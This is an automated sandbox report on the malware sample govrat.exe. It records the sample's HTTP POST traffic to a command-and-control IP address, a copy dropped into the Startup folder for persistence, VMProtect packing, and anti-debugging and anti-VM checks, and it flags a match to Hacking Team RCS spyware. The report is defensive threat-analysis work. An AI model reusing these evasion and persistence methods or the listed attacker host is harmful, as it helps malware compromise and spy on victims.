
Analysis Report

Overview

General Information

Joe Sandbox Version: 21.0.0
Analysis ID: 50649
Start time: 22:25:38
Joe Sandbox Product: Cloud
Start date: 19.03.2018
Overall analysis duration: 0h 14m 45s
Hypervisor based Inspection enabled: true
Report type: full
Sample file name: govrat.exe
Cookbook file name: default.jbs
Analysis system description: W7x64 Native with HVM (patch level Feb 2018, Office 2016, Java 1.8.0_161, Flash 28, Acrobat Reader DC 18, Internet Explorer 11, Chrome 64, Firefox 58)
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal56.evad.winEXE@5/2@0/1
HCA Information: Failed
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Adjusted system time to: 10/10/2017
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): mscorsvw.exe, WmiPrvSE.exe, sppsvc.exe, devmonsrv.exe, mediasrv.exe, jhi_service.exe, IntelMeFWService.exe, obexsrv.exe, LMS.exe, dllhost.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy     Score    Range      Reporting         Detection
Threshold    56       0 - 100    Report FP / FN    malicious

Confidence

Strategy     Score    Range    Further Analysis Required?    Confidence
Threshold    5        0 - 5    false


Classification

Signature Overview



Networking:

Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected:
    POST /index.html HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
    Content-Length: 440
    Host: 192.243.101.124
Source: global traffic | HTTP traffic detected:
    POST /index.html HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
    Content-Length: 32
    Host: 192.243.101.124
Posts data to webserver
Source: unknown | HTTP traffic detected:
    POST /index.html HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
    Content-Length: 440
    Host: 192.243.101.124
Urls found in memory or binary data
Source: explorer.exe | String found in binary or memory: file:///C:/Users/user/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/ASC.exellQ
Source: explorer.exe | String found in binary or memory: file:///C:/Users/user/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/ASC.exewlP
Source: explorer.exe | String found in binary or memory: file:///C:/Users/user/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/ASC.exeznX
Source: govrat.exe | String found in binary or memory: http://%S
Source: govrat.exe | String found in binary or memory: http://192.243.101.124/index.html
Source: govrat.exe | String found in binary or memory: http://192.243.101.124/index.htmlZZ)
Source: govrat.exe | String found in binary or memory: http://192.243.101.124e:
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: http://t2.symcb.com0
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: http://tl.symcd.com0&
Source: explorer.exe | String found in binary or memory: http://www.%s.comPA
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: https://www.thawte.com/cps0/
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: https://www.thawte.com/repository0W

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\govrat.exe | File created: C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe

Data Obfuscation:

Sample is protected by VMProtect
Source: govrat.exe | Static PE information: Section: .vmp1 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ASC.exe.1.dr | Static PE information: Section: .vmp1 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Entry point lies outside standard sections
Source: initial sample | Static PE information: section where entry point is pointing to: .vmp1
PE file contains sections with non-standard names
Source: govrat.exe | Static PE information: section name: .vmp0
Source: govrat.exe | Static PE information: section name: .vmp1
Source: ASC.exe.1.dr | Static PE information: section name: .vmp0
Source: ASC.exe.1.dr | Static PE information: section name: .vmp1
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0098C272 push edi; ret 1_2_00A13AA9
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009793A1 push edi; ret 1_2_009793AD
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097B969 push edi; ret 1_2_0097B96A
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00985056 push edi; ret 1_2_009D5A71
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0098B0D1 push edi; ret 1_2_009D404F
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00988D9E push edi; ret 1_2_00988D9F
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097D79A push edi; ret 1_2_00A168D4
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097D711 push edi; ret 1_2_00A0B8EA
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009805CE push edi; ret 1_2_009805E4
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009802DE push edi; ret 1_2_009A0EEB
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00977DA3 push edi; ret 1_2_009CDFD4
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009852AF push edi; ret 1_2_009852B0
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009814F4 push edi; ret 1_2_009DBD75
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097B278 push edi; ret 1_2_009B9A2F
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009580A5 push ecx; ret 1_2_009580B8
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0098B5E4 push edi; ret 1_2_009BF3FE
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097A9B7 push edi; ret 1_2_0097A9B8
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097AC17 push edi; ret 1_2_009B4D65
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0098AE5D push edi; ret 1_2_009DAA7F
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097E453 push edi; ret 1_2_009BD6B9
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097FD03 push edi; ret 1_2_0097FD04
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00978BE0 push edi; ret 1_2_009B02B9
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00985D50 push edi; ret 1_2_00985D6B
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00984432 push edi; ret 1_2_009C3C86
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00979733 push edi; ret 1_2_009AF6C2
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0098360A push edi; ret 1_2_009F21C4
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0098C32A push edi; ret 1_2_009F7EA7
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097808D push edi; ret 1_2_009EA573
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097C3A0 push edi; ret 1_2_0097C3A1
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097A11B push edi; ret 1_2_0097A11C
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00986FCD push edi; ret 1_2_00986FCE
Binary may include packed or encrypted code
Source: initial sample | Static PE information: section name: .vmp1 entropy: 7.94598915032
Source: initial sample | Static PE information: section name: .vmp1 entropy: 7.94598915032

Spreading:

Enumerates the file system
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00960762 GetProcAddress,GetProcAddress,FindFirstFileA,GetProcAddress,1_2_00960762
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D0762 GetProcAddress,GetProcAddress,FindFirstFileA,GetProcAddress,5_2_012D0762

System Summary:

Detected Hacking Team Remote Control System (RCS) spyware
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0095FE2E GetProcAddress,GetProcAddress,GetProcAddress,K32EnumDeviceDrivers,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,__wcsicoll,1_2_0095FE2E
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Desktop\govrat.exe | Memory allocated: 772C0000 page execute and read and write
Source: C:\Users\user\Desktop\govrat.exe | Memory allocated: 771C0000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 772C0000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 771C0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Memory allocated: 772C0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Memory allocated: 771C0000 page execute and read and write
Detected potential crypto function
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009641C3
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00966000
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00956502
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0095FB7F
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0096A780
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0096AE5C
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00966EED
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0096A22F
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0096BB94
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00969CDE
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00967EA6
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_1_00AC01CE
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_1_00ABFE67
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012DBB94
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D41C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D7EA6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012DA780
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D9CDE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D6000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012C6502
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012CFB7F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012DA22F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012DAE5C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D6EED
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_1_014301CE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_1_0142FE67
PE file contains strange resources
Source: govrat.exe | Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: ASC.exe.1.dr | Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: govrat.exe | Binary or memory string: OriginalFilenamewow64.dllj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamewow64lg2.dllj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamewow64cpu.dllj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameKernelbasej% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameCSRSS.Exe.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamewinsrv.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameWinInit.exe.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameWINLOGON.EXE.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameuser32j% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameservices.exe.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamelsasrv.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamesvchost.exe.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamewshtcpip.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamewship6.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamewshqos.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameAUTHUI.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenametzres.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamesppsvc.exe.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameInput.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameTipTsf.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameSpTip.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameTableTextService.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamegpsvc.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameaero.msstyles.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenametaskcomp.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamespoolsv.exe.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameBFE.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameFirewallAPI.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenametaskhost.exe.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameUSERINIT.EXE.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: originalfilename vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameMSCMS.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamej% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameMsCtfMonitor.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamesnmptrap.exe.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamelmhsvc.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamedwm.exe.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamedhcpcore.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamepeerdistsh.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameNetLogon.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamesstpsvc.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamelocalspl.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamenetmsg.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameFXSRESM.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenametaskeng.exe.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameWsdMon.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamevsstrace.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameWLDAP32.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamenetprofm.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameThemeUI.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameExplorerFrame.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameesrb.dll.muiH vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamexpsrchvw.exe.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamestobject.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamerasdlg.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameAltTab.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamewscui.cpl.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameHCPROVIDERS.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameSearchIndexer.exe.mui@ vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamePNIDUI.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenametquery.dll.mui@ vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamesidebar.EXE.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameMsMpRes.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenametwext.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamempr.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameschedsvc.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameFDResPub.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameFunDisc.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamerpcrt4.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameFDPrint.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameBASEBRD.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameimageres.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameWINMM.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameDocumentPerformanceEvents.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameWerConCpl.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameMSHTML.DLL.MUID vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameSHSVCS.DLL.MUIj% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenametaskmgr.exe.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameSndVolSSO.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenamewin32spl.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameinetpp.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameadvapi32.dll.muij% vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilenameprovsvc.dll.muij% vs govrat.exe
Classification label
Source: classification engine | Classification label: mal56.evad.winEXE@5/2@0/1
Contains functionality to check free disk space
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009641C3 GetProcAddress,GetDiskFreeSpaceExW,1_2_009641C3
Launches a second explorer.exe instance
Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown | Process created: C:\Windows\explorer.exe
Queries process information (via WMI, Win32_Process)
Source: C:\Users\user\Desktop\govrat.exe | String freed: SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\govrat.exe | String freed: SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\govrat.exe | String freed: SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\govrat.exe | String freed: SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\govrat.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Reads ini files
Source: C:\Users\user\Desktop\govrat.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\govrat.exe | Key opened: HKEY_USERS\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\govrat.exe 'C:\Users\user\Desktop\govrat.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe'
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\govrat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3AD05575-8857-4850-9277-11B85BDB8E09}\InProcServer32
PE file has a valid certificate
Source: govrat.exe | Static PE information: certificate valid
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: govrat.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: wow64win.pdb | source: govrat.exe, explorer.exe, ASC.exe
Source: Binary string: wow64cpu.pdb | source: govrat.exe, explorer.exe, ASC.exe
Source: Binary string: wow64.pdbH | source: govrat.exe, explorer.exe, ASC.exe
Source: Binary string: wow64win.pdbH | source: govrat.exe, explorer.exe, ASC.exe
Source: Binary string: wow64.pdb | source: govrat.exe, explorer.exe, ASC.exe

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: ASC.exe | Binary or memory string: Progman
Source: ASC.exe | Binary or memory string: Program Manager
Source: ASC.exe | Binary or memory string: Shell_TrayWnd

Anti Debugging:

Checks for debuggers (devices)
Source: C:\Windows\explorer.exe | File opened: C:\Windows\WinSxS\FileMaps\users_user_appdata_roaming_microsoft_windows_start_menu_programs_startup_1a6465368f7d89b6.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\govrat.exe | System information queried: KernelDebuggerInformation
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00982D1B rdtsc 1_2_00982D1B

Malware Analysis System Evasion:

Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Stalling execution: Execution stalls by calling Sleep (graph_5-20250)
Source: C:\Users\user\Desktop\govrat.exe | Stalling execution: Execution stalls by calling Sleep (graph_1-21009)
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00982D1B rdtsc 1_2_00982D1B
Contains functionality to enumerate device drivers
Source: C:\Users\user\Desktop\govrat.exe | Code function: GetProcAddress,GetProcAddress,GetProcAddress,K32EnumDeviceDrivers,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,__wcsicoll,1_2_0095FE2E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: GetProcAddress,GetProcAddress,GetProcAddress,K32EnumDeviceDrivers,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,__wcsicoll,5_2_012CFE2E
Enumerates the file system
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming
Is looking for software installed on the system
Source: C:\Users\user\Desktop\govrat.exe | Registry key enumerated: More than 124 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\explorer.exe TID: 1216 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3868 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3904 | Thread sleep time: -60000s >= -60000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\govrat.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00960762 GetProcAddress,GetProcAddress,FindFirstFileA,GetProcAddress,1_2_00960762
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D0762 GetProcAddress,GetProcAddress,FindFirstFileA,GetProcAddress,5_2_012D0762
Program exit points
Source: C:\Users\user\Desktop\govrat.exe | API call chain: ExitProcess graph end node (graph_1-20536)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | API call chain: ExitProcess graph end node (graph_5-20089)
Queries a list of all running drivers
Source: C:\Users\user\Desktop\govrat.exe | System information queried: ModuleInformation

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00965B62 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00965B62
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\govrat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\govrat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\govrat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\govrat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
